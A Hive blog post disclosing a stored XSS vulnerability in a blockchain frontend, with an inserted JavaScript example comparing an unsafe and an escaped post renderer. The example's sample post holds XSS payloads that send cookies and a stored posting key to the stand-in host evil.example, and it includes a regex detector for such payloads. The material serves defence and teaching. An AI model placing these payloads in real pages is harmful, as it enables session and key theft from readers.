XSS vulnerability in one of the Hive frontends

Not sure which pic to choose for this article. This.. or this one.. 🙂
Pics taken from "Humorous programming books by @ThePracticalDev"




I was just browsing around Hive and decided to navigate to the Dapps section to see if anything cool came out.

I attended HiveFest on Friday (my pics here!) and heard about a frontend that got me intrigued. I decided to check it out and noticed that the styling was off in some places.

That got me thinking: if the devs rushed things out from a design perspective, they probably also didn't give too much thought to security.

I tried a few tricks up my sleeve and managed to store some (harmless) code on the Hive blockchain that now gets executed by every user who visits some specific content through that frontend.

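To make the class of bug concrete, here is an added example that is not code from this post or from any Hive frontend: a toy post renderer in the style of a blockchain frontend. `renderUnsafe()` trusts the post body exactly as it comes back from the chain, so HTML and `javascript:` links stored in a post run in every reader's browser; `renderSafe()` escapes the body first and only re-introduces markup it generates itself, with an allowlist of link schemes. The sample post, its payloads, the field names and the `posting_key` storage item are all constructed assumptions for the illustration, not details of the real vulnerability.

```javascript
// Added example: toy renderer contrasting a stored-XSS-prone path with a hardened one.
// Nothing here is code from the post or from a real Hive frontend.

// Constructed sample post, as a frontend would receive it from the chain.
// Field names, payloads and the "posting_key" storage item are assumptions.
const SAMPLE_POST = {
  author: "attacker",
  permlink: "harmless-looking-post",
  body: [
    "# Hello Hive",
    "Look at this [link](javascript:location='https://evil.example/?c='+document.cookie) and this image:",
    "<img src=x onerror=\"fetch('https://evil.example/?k='+localStorage.getItem('posting_key'))\">",
  ].join("\n"),
};

// Tiny markdown subset shared by both renderers: "# heading", paragraphs, [label](href).
// linkFn decides what a link becomes, so the safe renderer can reject bad schemes.
function markdownToHtml(text, linkFn) {
  return text
    .split("\n")
    .map((line) => {
      const h = line.match(/^#\s+(.*)$/);
      return h ? `<h1>${h[1]}</h1>` : `<p>${line}</p>`;
    })
    .join("\n")
    .replace(/\[([^\]]*)\]\(([^)\s]*)\)/g, (_m, label, href) => linkFn(label, href));
}

// Vulnerable: raw HTML in the body survives untouched and any URL scheme is accepted.
function renderUnsafe(post) {
  return markdownToHtml(post.body, (label, href) => `<a href="${href}">${label}</a>`);
}

// Escape the five characters that can open a tag or break out of an attribute.
// "&" must be handled first so the other entities are not double-escaped.
function escapeHtml(s) {
  return s
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Hardened: escape before any markup is generated, so chain content can never open
// a tag; then only allow absolute http(s) or site-relative link targets.
function renderSafe(post) {
  const allowed = /^(https?:\/\/|\/)/i;
  return markdownToHtml(escapeHtml(post.body), (label, href) =>
    allowed.test(href) ? `<a href="${href}" rel="noopener noreferrer">${label}</a>` : label
  );
}

// Cheap check for use in tests or a pre-render gate: does the output contain
// anything a browser would execute? Event handlers are only counted inside a tag,
// so escaped text such as "onerror=&quot;" does not trigger it.
function hasActiveContent(html) {
  return (
    /<script/i.test(html) ||
    /<[a-z][^>]*\son\w+\s*=/i.test(html) ||      // inline event handler inside a tag
    /href\s*=\s*["']?\s*javascript:/i.test(html) // javascript: URL in a link
  );
}

console.log("unsafe:\n" + renderUnsafe(SAMPLE_POST));
console.log("safe:\n" + renderSafe(SAMPLE_POST));
```

The order matters: escaping has to happen before the markdown step, otherwise the `<a>` and `<h1>` tags the renderer emits would be escaped too, or, worse, the escaping would be skipped for "trusted" markup that actually came from the post. A real frontend would use a maintained sanitizer with an element and attribute allowlist rather than this hand-rolled subset, but the two rules it demonstrates (treat chain content as untrusted text, allowlist URL schemes) are the ones that close the bug described above.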




A couple of months back I gave a tech talk at my company about some security vulnerabilities I found in three different internal systems that my employer uses to manage employees' resumes, store performance reviews and train staff.

Here is one of the slides I used with a summary of how dangerous an XSS vulnerability can be:

[Slide screenshot, 21 Dec 2020: summary of how dangerous an XSS vulnerability can be]




The vulnerability has now been reported to the site maintainer. More details will follow once it's fixed.

I'll also give my opinion on the effectiveness of the fix and on the team's response time.




Some more funny pics because these (fake) books are too funny.. 🙂



UPDATES:

28/12/2020: It looks like @louis88 reported another XSS in the same website weeks ago.

The maintainer does not have time to fix the issue at the moment:

"Just overwhelmed for almost 9 months with COVID stuff so that I have no time for anything else..."

Community members may be able to work on it since the repository is open source. Stay tuned for updates.


By @gaottantacinque / @keys-defender 🔑



8 comments
Security is hard. That's why I'm happy not being a web developer. I work on systems that are often off-line or out of sight.

@crokkon Yep, it was me (@gaottantacinque) who reported the XSS in not one but two block explorers. All the vulnerabilities I have disclosed so far have been fixed in a timely manner.

Congratulations @gaottantacinque! You have completed the following achievement on the Hive blockchain and have been rewarded with new badge(s) :

You received more than 1000 as payout for your posts. Your next target is to reach a total payout of 2000

You can view your badges on your board and compare yourself to others in the Ranking
If you no longer want to receive notifications, reply to this comment with the word STOP